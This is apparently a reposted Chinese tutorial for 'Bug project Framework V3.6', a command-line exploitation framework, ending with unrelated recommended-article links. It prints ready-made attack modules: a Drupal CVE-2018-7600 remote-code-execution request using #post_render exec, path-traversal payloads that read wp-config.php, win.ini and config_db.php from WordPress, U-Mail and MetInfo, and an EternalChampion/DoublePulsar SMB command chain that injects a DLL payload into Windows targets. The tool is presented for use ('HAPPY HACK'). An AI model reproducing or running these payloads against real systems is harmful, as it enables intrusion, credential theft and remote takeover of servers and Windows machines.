热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

web安全中Bug

这篇文章将为大家详细讲解有关web安全中BugprojectFrameworkV3.6命令行版本怎么用,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收

文章目录[隐藏]

  • 0x01 前言
  • 0x02 项目简介
  • 0x03 帮助
  • 0x04 上手操作
  • Web Exploit(Drupal核心远程代码执行漏洞):
  • Web Poc(CMS Getshell 漏洞检测):
  • Buffer(Eternalchampion):

这篇文章将为大家详细讲解有关web安全中Bug project Framework V3.6命令行版本怎么用,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

0x01 前言


关于BPF框架的图形化界面是我在2017年4月份开始编写的,开发至今已有1年又1个月,但是由于图形化界面对于漏洞利用的便携性和简易性比较高,攻击性比较大,所以迫于多方面原因,图形化界面不会公开,在上周着手编写了这个3.6版本的命令行版本。

关于网络上流传的被泄露的3.0图形化版本,我说明一下,这个版本存在很多的bug,不只是模块语法的bug,而且被泄漏的版本被捆绑了很多木马,希望不要贸然下载,以免遭受不必要的损失!

0x02 项目简介


软件名称:Bug project Framework
版本: 3.6

0x03 帮助


在BPF根命令行下:

      help                查询帮助

      reload              重新加载框架,此时会刷新全部模块

      search              搜索模块关键词并显示
                          ( e.g.  search ms17-010 )
      searchall           显示所有模块

      use                 使用模块
                          ( e.g.  use /buffer/ms17-010 Scan.bpf )
      set shellcodes      配置默认Shellcode路径

      exit                退出BPF

在BPF模块命令行下:

      help                查询帮助

      show options        查看当前模块参数以及配置情况

      set options         设置当前模块参数以及配置

      set shellcodes      配置默认Shellcode路径

      run                 运行模块

      exit                退出当前模块

当你输入除上述指定规定参数以外的命令时,BPF框架会将命令识别为系统命令,提交Windows操作系统进行处理

      HAPPY HACK !GOOD LUCK !
      2018.5.7 BY Fplyth0ner

0x04 上手操作


首先我们打开命令行,切换到BPF框架所在文件夹,框架文件结构如下图:

web安全中Bug project Framework V3.6命令行版本怎么用

然后键入BPF框架主文件全名,并执行:

web安全中Bug project Framework V3.6命令行版本怎么用

可以看到框架当前可调用 59 个Web Exploit模块,12 个Web Poc模块和33个 Buffer 模块。Web Exploit模块提供Web应用漏洞的检查,Web Poc模块提供Web应用漏洞检测,Buffer模块提供外部程序的调用,例如Python,Java等解释型语言的代码,或者是外部可执行文件的调用,操作灵活。

由于框架仅仅是给予模块一个执行环境,功能主要通过模块来实现,所以我们简单展示一下三种模块的代码。

Web Exploit(Drupal核心远程代码执行漏洞):

命令

输出文件名

2

post

/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.18.4

Content-Length: 159

mail[#markup]= | tee .txt&mail[#type]=markup&form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec

get

/.txt

CVE-2018-7600

Drupal核心远程代码执行漏洞

影响版本:

Drupal 6.x,7.x,8.x

Web Poc(CMS Getshell 漏洞检测):

3

WordPress DB-Backup Plugin 任意文件下载

get

/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php

1

define(

U-Mail任意文件遍历/下载

get

/webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=file://C:/windows/win.ini&type=text/htm

1

[fonts]

MetInfo 5.2 任意文件读取

get

/include/thumb.php?x=1&y=/../../../config&dir=config_db.php

1

con_db_host

专为CMS通杀的任意文件读取漏洞做检测

直接输入 http://网址 即可开始检测

Buffer(Eternalchampion):

inject

NB,NR,MR

dll

IP地址

端口

攻击服务

系统版本

系统架构

5

Doublepulsar-1.3.1.exe --NetworkTimeout 60 --TargetIp --TargetPort --Protocol SMB --Architecture --Function OutputInstall --OutputFile 1.bin

cj.exe

ping -n 3 127.1 >nul

Eternalchampion-2.0.0.exe --TargetIp --TargetPort --ShellcodeBuffer --Protocol --Target

Doublepulsar-1.3.1.exe --TargetIp --TargetPort 445 --DllPayload --Protocol SMB --Architecture --Function Rundll

             上 下 对 应

端口:        139   445

攻击服务:    NBT   SMB

系统架构:    X86   X64

系统版本:

   XP_SP0SP1_X86

         Windows XP Sp0 and Sp1, 32-bit

   XP_SP2SP3_X86

         Windows XP Sp2 and Sp3, 32-bit

   XP_SP1_X64

         Windows XP Sp1, 64-bit

   XP_SP2_X64

         Windows XP Sp2, 64-bit

   SERVER_2003_SP0

         Windows Sever 2003 Sp0, 32-bit

   SERVER_2003_SP1

         Windows Sever 2003 Sp1, 32-bit/64-bit

   SERVER_2003_SP2

         Windows Sever 2003 Sp2, 32-bit/64-bit

   VISTA_SP0

         Windows Vista Sp0, 32-bit/64-bit

   VISTA_SP1

         Windows Vista Sp1, 32-bit/64-bit

   VISTA_SP2

         Windows Vista Sp2, 32-bit/64-bit

   SERVER_2008_SP0

         Windows Server 2008 Sp0, 32-bit/64-bit

   SERVER_2008_SP1

         Windows Server 2008 Sp1, 32-bit/64-bit

   SERVER_2008_SP2

         Windows Server 2008 Sp2, 32-bit/64-bit

   WIN7_SP0

         Windows 7 Sp0, 32-bit/64-bit

   WIN7_SP1

         Windows 7 Sp1, 32-bit/64-bit

   SERVER_2008R2_SP0

         Windows Server 2008 R2 Sp0, 32-bit/64-bit

   SERVER_2008R2_SP1

         Windows Server 2008 R2 Sp1, 32-bit/64-bit

   WIN8_SP0

         Windows 8 Sp0, 32-bit/64-bit

回到命令行界面,我们输入: Search 命令执行

web安全中Bug project Framework V3.6命令行版本怎么用

搜索到21个可用模块,我们挑选第二个模块,使用 Use 命令进行模块使用

web安全中Bug project Framework V3.6命令行版本怎么用

在该模块的提示符下,使用 show options 命令查看模块配置

web安全中Bug project Framework V3.6命令行版本怎么用

使用 set options 修改模块配置,操作如下:

web安全中Bug project Framework V3.6命令行版本怎么用

可以看到已经修改成功。

web安全中Bug project Framework V3.6命令行版本怎么用

然后键入 run ,回车,即可测试指定目标。

如果想退出当前模块,输入:exit 即可回到BPF主提示符,关于更多其他类型的模块使用,和上述方法大致相同。同时,在BPF命令行下,本机系统命令也同样可以使用

web安全中Bug project Framework V3.6命令行版本怎么用

关于“web安全中Bug project Framework V3.6命令行版本怎么用”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。


推荐阅读
  • 用SpringBoot实现万能文件在线预览
    推荐一个用SpringBoot搭建的文档在线预览解决方案:kkFileView,一款成熟且开源的文件文档在线预览项目解决方案,对标业内付 ... [详细]
  • 搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的详细步骤
    本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的步骤,包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]
  • 本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容,主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]
  • Java序列化对象传给PHP的方法及原理解析
    本文介绍了Java序列化对象传给PHP的方法及原理,包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用,以及代码执行序列化所需要的权限。最后指出,序列化会将对象实例的所有字段都进行序列化,使得数据能够被表示为实例的序列化数据,但只有能够解释该格式的代码才能够确定数据的内容。 ... [详细]
  • 本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]
  • 如何使用Java获取服务器硬件信息和磁盘负载率
    本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务,并获取服务器的磁盘信息,并将结果输出。然后在本地使用JS编写一个AJAX脚本,远程请求服务端的程序,得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]
  • 知识图谱——机器大脑中的知识库
    本文介绍了知识图谱在机器大脑中的应用,以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例,说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案,如搜索关键词"Marie Curie",会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革,不仅美国的微软必应,中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]
  • ZSI.generate.Wsdl2PythonError: unsupported local simpleType restriction ... [详细]
  • 本文介绍了RPC框架Thrift的安装环境变量配置与第一个实例,讲解了RPC的概念以及如何解决跨语言、c++客户端、web服务端、远程调用等需求。Thrift开发方便上手快,性能和稳定性也不错,适合初学者学习和使用。 ... [详细]
  • Python正则表达式学习记录及常用方法
    本文记录了学习Python正则表达式的过程,介绍了re模块的常用方法re.search,并解释了rawstring的作用。正则表达式是一种方便检查字符串匹配模式的工具,通过本文的学习可以掌握Python中使用正则表达式的基本方法。 ... [详细]
  • Python爬虫中使用正则表达式的方法和注意事项
    本文介绍了在Python爬虫中使用正则表达式的方法和注意事项。首先解释了爬虫的四个主要步骤,并强调了正则表达式在数据处理中的重要性。然后详细介绍了正则表达式的概念和用法,包括检索、替换和过滤文本的功能。同时提到了re模块是Python内置的用于处理正则表达式的模块,并给出了使用正则表达式时需要注意的特殊字符转义和原始字符串的用法。通过本文的学习,读者可以掌握在Python爬虫中使用正则表达式的技巧和方法。 ... [详细]
  • 本文整理了315道Python基础题目及答案,帮助读者检验学习成果。文章介绍了学习Python的途径、Python与其他编程语言的对比、解释型和编译型编程语言的简述、Python解释器的种类和特点、位和字节的关系、以及至少5个PEP8规范。对于想要检验自己学习成果的读者,这些题目将是一个不错的选择。请注意,答案在视频中,本文不提供答案。 ... [详细]
  • python3 nmap函数简介及使用方法
    本文介绍了python3 nmap函数的简介及使用方法,python-nmap是一个使用nmap进行端口扫描的python库,它可以生成nmap扫描报告,并帮助系统管理员进行自动化扫描任务和生成报告。同时,它也支持nmap脚本输出。文章详细介绍了python-nmap的几个py文件的功能和用途,包括__init__.py、nmap.py和test.py。__init__.py主要导入基本信息,nmap.py用于调用nmap的功能进行扫描,test.py用于测试是否可以利用nmap的扫描功能。 ... [详细]
  • node.jsurlsearchparamsAPI哎哎哎 ... [详细]
  • 现在很多App在与服务器接口的请求和响应过程中,为了安全都会涉及到加密和解密的问题,如果不加的话就会是明文的,即使加了GZIP也可以被直接解压成明文。如果同时有Android和IO ... [详细]
author-avatar
蓝色水气球_453
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有